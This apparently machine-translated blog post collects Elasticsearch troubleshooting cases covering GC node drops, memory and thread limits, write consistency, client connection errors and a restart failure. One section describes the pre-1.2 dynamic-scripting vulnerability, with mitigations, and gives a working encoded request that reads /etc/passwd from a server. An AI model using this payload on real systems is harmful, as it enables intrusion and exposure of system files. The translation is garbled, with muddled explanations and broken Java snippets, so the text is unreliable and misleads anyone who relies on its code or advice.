1. Node detachment caused by GC
Because the GC will cause the JVM to stop working, if a node has too long GC time, Master Ping3 (Zen Discovery The default ping failure Retries 3 times) will remove the node from the cluster, causing the index to be reassigned.
Workaround:
(1) Optimizing GC, reducing GC time.
(2) The number of retries (es parameter: ping_retries) and timeout time (es parameter: ping_timeout) Zen Discovery are adjusted.
It turned out that the root cause was a system with a node with a hard drive full. Causes system performance to degrade.
2.out of memory error
Because the size of the field data cache is unlimited by default for ES, the query will put the value of the field in memory, especially the facet query, the memory requirements are very high, it will put the results in memory, and then sorted and so on operations, always use memory, until the memory run out, An out of memory error can occur when there is not enough memory.
Workaround:
(1) To set the cache type of ES as soft Reference, its main feature is the strong reference function. This type of memory is recycled only when there is not enough memory, so they are usually not recycled when memory is sufficient. In addition, these reference objects are guaranteed to be set to NULL before Java throws OutOfMemory exceptions. It can be used to realize the cache of some common pictures, realize the function of cache, ensure the maximum use of memory without causing outofmemory. In the ES of the configuration file plus Index.cache.field.type:soft can be.
(2) Set the maximum number of ES cache data and cache expiration time, by setting index.cache.field.max_size:50000 to set the maximum cache field value to 50000, set Index.cache.field.expire: 10m set the expiration time to 10 minutes.
3. Unable to create local thread problem
Es recovery times error: recoverfilesrecoveryexception[[index][3] Failed to transfer [215] files with total size of [9.4GB]]; Nested:outofmemoryerror[unable to create new native thread]; ]]
Initially thought it was a file handle limit, but think of the previous report is too many open file this error, and also make the data larger. Check it out. The maximum number of threads for a process's JVM process is: virtual memory/(stack size *1024*1024), which means that the larger the virtual memory or the smaller the stack, the more threads can be created. Reset or will be reported that this fault, arguably can create the number of threads is fully enough, just want to be some of the limitations of the system. Later on the internet to find that is max user processes problem, this value defaults to 1024, which is the name of the user's largest open process, but the official note is that the user can create a maximum number of threads, because a process has at least one thread, so indirectly affect the maximum number of processes. This is not a mistake when you increase this parameter.
Workaround:
(1) Increase the JVM's heap memory or reduce the XSS stack size (the default is 512K).
(2) Open/etc/security/limits.conf, the soft nproc 1024 this line of 1024 to change the line.
4. Concurrent Insert data error when cluster status is yellow
[7]: Index [index], type [index], id [1569133], message [unavailableshardsexception[[index][1] [4] Shardit, [2] Active:t Imeout waiting for [1m], Request:org.elasticsearch.action.bulk.bulkshardrequest@5989fa07]]
This is the error message, when the cluster status is yellow, that is, the replica is not assigned. At that time, the replica is set to 2, only one node, when you set the copy is larger than the allocated machine, at this time if you insert data is likely to report the above error, because the ES write consistency by default is to use quorum, that is, quorum value must be greater than (copy number/2+1), I 2 that is, to insert at least two indexes, because only one node, quorum equals 1, so only inserted into the primary index, the copy can not find to report the above error.
Workaround:
(1) Remove the unassigned copy.
(2) To change the write consistency to one, that is, only write an index on the line.
5. Set up a warning when the JVM locks up memory
When setting bootstrap.mlockall:true, boot es alarm unknown mlockall error 0, because the Linux system by default allows the process to lock the memory 45k.
Workaround: Set to Unrestricted, Linux command: Ulimit-l Unlimited
6. Error using API causes cluster card to die
In fact, this is a very low-level mistake. function is to update some data, some data may be deleted, but the deletion of colleagues using the Deletebyquery this interface, through the construction of Boolquery to delete the data ID passed in, detect the data deleted. But the problem is boolquery up to only 1024 conditions, 100 are already a lot of conditions, so the query all of a sudden ES cluster card died.
Workaround: Bulk delete operation with Bulkrequest.
7.org.elasticsearch.transport.remotetransportexception:failed to deserialize exception response from Stream
Reason: The JDK version is different between ES nodes
Workaround: Unify JDK environment
8. Org.elasticsearch.client.transport.NoNodeAvailableException:No node Available
1 Port Error
Client = new Transportclient (). addtransportaddress (New Inetsockettransportaddress (IPAddress, 9300));
9300 written in 9200, no node available
If you are not connected to the local, pay attention to IP is not correct
2 The reference version of the jar quote does not match, the open service is what version, the reference Jar best match (this I did not try, anyway, my match)
3 If you change the cluster name and set the cluster name
Settings settings = Immutablesettings.settingsbuilder (). Put ("Cluster.name", "xxx"). build (); Client = new Transportclient (settings). addtransportaddress (New Inetsockettransportaddress (IPAddress, 9300));
4 cluster over 5s no response
Workaround 1. Set Client.transport.ping_timeout
2. Add while (true) in the code {
try {
Bulk.execute (). Actionget (Getretrytimeout ());
Break
}
catch (Nonodeavailableexception cont) {
Thread.Sleep (5000);
Continue
}
}
9.elasticsearch recently found a vulnerability, can remotely execute arbitrary code, because Elasticsearch provides the HTTP interface, resulting in the possibility of CSRF, such as through malicious page browsing attacks.
Vulnerability Impact Version:
Elasticsearch below 1.2
Test code:
http:// esserverip : 9200/_search?source=%7b%22size%22%3a1%2c%22query%22%3a%7b%22filtered%22%3a%7b% 22query%22%3a%7b%22match_all%22%3a%7b%7d%7d%7d%7d%2c%22script_fields%22%3a%7b%22%2fetc%2fhosts%22%3a%7b% 22script%22%3a%22import%20java.util.*%3b%5cnimport%20java.io.*%3b%5cnnew%20scanner (New%20File (%5C%22%2Fetc% 2fhosts%5c%22)). Usedelimiter (%5c%22%5c%5c%5c%5cz%5c%22). Next ()%3b%22%7d%2c%22%2fetc%2fpasswd%22%3a%7b%22script %22%3a%22import%20java.util.*%3b%5cnimport%20java.io.*%3b%5cnnew%20scanner (New%20file (%5C%22%2Fetc%2Fpasswd%5C %22)). Usedelimiter (%5c%22%5c%5c%5c%5cz%5c%22). Next ()%3b%22%7d%7d%7d&callback=jquery111102863897154977554_ 1400571156308&_=1400571156309
Browser will return/etc/passwd content
Solution :
1, in the configuration file elasticsearch.yml set Script.disable_dynamic:true
2, strictly restrict access to the Elasticsearch service IP address
Reference:
Http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts
503 Error after reboot
The details are as follows:
[2014-09-23 17:42:33,499] [WARN] [Transport.netty] [Erik Magnus lehnsherr] message isn't fully read (request) for [4961353] and
Action [Discovery/zen/join/validate], resetting
[2014-09-23 17:42:33,522] [INFO] [Discovery.zen] [Erik Magnus Lehnsherr] failed to send join request to master [[Red lotus][
UG2WBJPDTHOB-EJZJFRSOW][N025.CORP.NCFGROUP.COM][INET[/10.18.6.25:9300]]], reason [ Org.elasticsearch.transport.RemoteTransportException:
[Red Lotus] [INET[/10.18.6.25:9300]] [Discovery/zen/join]; Org.elasticsearch.transport.RemoteTransportException: [Erik Magnus Lehnsherr]
[INET[/10.18.6.90:9300]] [Discovery/zen/join/validate]; Org.elasticsearch.ElasticsearchIllegalArgumentException:No Custom Index Metadat
A factory registered for type [Rivers]]
Problem reason: All use the default cluster name, different people different I configuration sent to the cluster will connect and select Master, sometimes because of IP restrictions can not connect.
Change: Own test service as much as possible personality naming
References: http://blog.csdn.net/laigood/article/details/8193170
From http://blog.csdn.net/july_2/article/details/24728733